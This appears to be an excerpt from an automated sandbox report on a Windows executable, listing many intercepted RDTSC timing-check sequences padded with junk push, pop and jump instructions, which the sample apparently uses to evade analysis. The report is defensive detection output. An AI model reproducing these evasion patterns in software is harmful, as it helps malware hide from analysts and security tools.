                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8CE9B second address: C8CEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8D2B1 second address: C8D2B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8D809 second address: C8D81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C3Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8D81C second address: C8D840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F1CC8B8C9E6h 0x0000000a popad 0x0000000b jmp 00007F1CC8B8C9F9h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8DB12 second address: C8DB1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F1CC8BB7C36h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB2B second address: C8EB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB2F second address: C8EB37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB37 second address: C8EB43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F1CC8B8C9E6h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB43 second address: C8EB4D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB4D second address: C8EB64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F1CC8B8C9EAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C8EB64 second address: C8EB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C93D26 second address: C93D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C960B0 second address: C960BF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C98F94 second address: C98FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 jmp 00007F1CC8B8C9F3h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA4833 second address: CA485C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C41h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1CC8BB7C3Ch 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA485C second address: CA4861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA4861 second address: CA4869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA46D0 second address: CA46D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CA46D4 second address: CA46EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CAC1CF second address: CAC1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F1CC8B8C9E6h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CAC1DE second address: CAC217 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jg 00007F1CC8BB7C73h 0x00000010 push ebx 0x00000011 jng 00007F1CC8BB7C36h 0x00000017 pop ebx 0x00000018 pushad 0x00000019 jmp 00007F1CC8BB7C40h 0x0000001e je 00007F1CC8BB7C36h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CB2778 second address: CB27A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8B8C9F0h 0x00000008 jmp 00007F1CC8B8C9F9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CB3D97 second address: CB3D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CB3D9B second address: CB3DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CBC25F second address: CBC268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5DDF second address: CC5DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5DE3 second address: CC5DE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5DE7 second address: CC5E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1CC8B8C9EEh 0x0000000c pushad 0x0000000d popad 0x0000000e jnl 00007F1CC8B8C9E6h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E01 second address: CC5E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F1CC8BB7C49h 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E24 second address: CC5E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E35 second address: CC5E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E3B second address: CC5E48 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC5E48 second address: CC5E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1CC8BB7C36h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC4C5E second address: CC4C87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F1CC8B8C9F4h 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CC9861 second address: CC986D instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC5DB second address: CCC5E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1A2 second address: CCC1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1A6 second address: CCC1B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jns 00007F1CC8B8C9E6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1B9 second address: CCC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CCC1C6 second address: CCC1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CD5193 second address: CD51D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 pop edi 0x0000000a jmp 00007F1CC8BB7C49h 0x0000000f jbe 00007F1CC8BB7C38h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop eax 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CD51D7 second address: CD51DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDC7B3 second address: CDC7B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDC7B7 second address: CDC7C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CE07F6 second address: CE0807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 je 00007F1CC8BB7C36h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CE066C second address: CE0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CE0670 second address: CE0690 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1CC8BB7C47h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDB2AC second address: CDB2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CDB2B8 second address: CDB2BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CEF04C second address: CEF056 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CEED6C second address: CEED83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: CEED83 second address: CEED88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D085BB second address: D085C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F1CC8BB7C36h 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0888D second address: D0889E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1CC8B8C9E6h 0x0000000a popad 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D08A78 second address: D08A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C3Dh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D08C1F second address: D08C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9ECh 0x00000009 push edx 0x0000000a pop edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0D0C6 second address: D0D0D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F1CC8BB7C36h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0D0D0 second address: D0D14D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e or edx, dword ptr [ebp+122D2B57h] 0x00000014 push 00000004h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F1CC8B8C9E8h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov edx, dword ptr [ebp+122D185Ah] 0x00000036 call 00007F1CC8B8C9E9h 0x0000003b ja 00007F1CC8B8C9FDh 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jng 00007F1CC8B8C9E8h 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0D14D second address: D0D152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0D152 second address: D0D158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0E551 second address: D0E571 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8BB7C44h 0x00000008 jmp 00007F1CC8BB7C3Ch 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 je 00007F1CC8BB7C36h 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D101F5 second address: D101F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D101F9 second address: D101FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0FDD1 second address: D0FDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F1CC8B8C9E6h 0x0000000a ja 00007F1CC8B8CA00h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0FDFE second address: D0FE0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1CC8BB7C36h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0FE0C second address: D0FE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F1CC8B8C9E6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: D0FE1B second address: D0FE21 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D004E second address: 53D006A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53D006A second address: 53D007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Eh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 541057E second address: 54105FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 09128254h 0x00000008 pushfd 0x00000009 jmp 00007F1CC8B8C9EDh 0x0000000e xor eax, 73D5C516h 0x00000014 jmp 00007F1CC8B8C9F1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F1CC8B8C9EEh 0x00000023 push eax 0x00000024 pushad 0x00000025 mov bh, 38h 0x00000027 pushfd 0x00000028 jmp 00007F1CC8B8C9EAh 0x0000002d sbb al, 00000068h 0x00000030 jmp 00007F1CC8B8C9EBh 0x00000035 popfd 0x00000036 popad 0x00000037 xchg eax, ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b mov ebx, 5EE177D6h 0x00000040 jmp 00007F1CC8B8C9F7h 0x00000045 popad 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 54105FE second address: 541063F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F1CC8BB7C3Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F1CC8BB7C3Dh 0x00000019 push esi 0x0000001a pop edi 0x0000001b popad 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 541063F second address: 541065B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F8h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A00EA second address: 53A014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1CC8BB7C3Ch 0x00000011 and cl, 00000028h 0x00000014 jmp 00007F1CC8BB7C3Bh 0x00000019 popfd 0x0000001a jmp 00007F1CC8BB7C48h 0x0000001f popad 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F1CC8BB7C3Eh 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A014F second address: 53A016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 1E8B0CA6h 0x00000012 push edx 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0259 second address: 53A0268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0268 second address: 53A0280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53A0280 second address: 53A0284 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0DAD second address: 53C0DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0DB1 second address: 53C0DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0DB7 second address: 53C0E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1CC8B8C9ECh 0x00000008 pop eax 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov edi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F1CC8B8C9F2h 0x0000001a xor si, 4C98h 0x0000001f jmp 00007F1CC8B8C9EBh 0x00000024 popfd 0x00000025 mov bx, si 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov bl, al 0x00000030 pushfd 0x00000031 jmp 00007F1CC8B8C9F3h 0x00000036 sbb al, 0000000Eh 0x00000039 jmp 00007F1CC8B8C9F9h 0x0000003e popfd 0x0000003f popad 0x00000040 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0E33 second address: 53C0E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C0992 second address: 53C09BA instructions: 0x00000000 rdtsc 0x00000002 call 00007F1CC8B8C9F2h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CC8B8C9ECh 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C09BA second address: 53C09C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C09C0 second address: 53C09C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C08E8 second address: 53C08EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: 53C08EE second address: 53C08F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
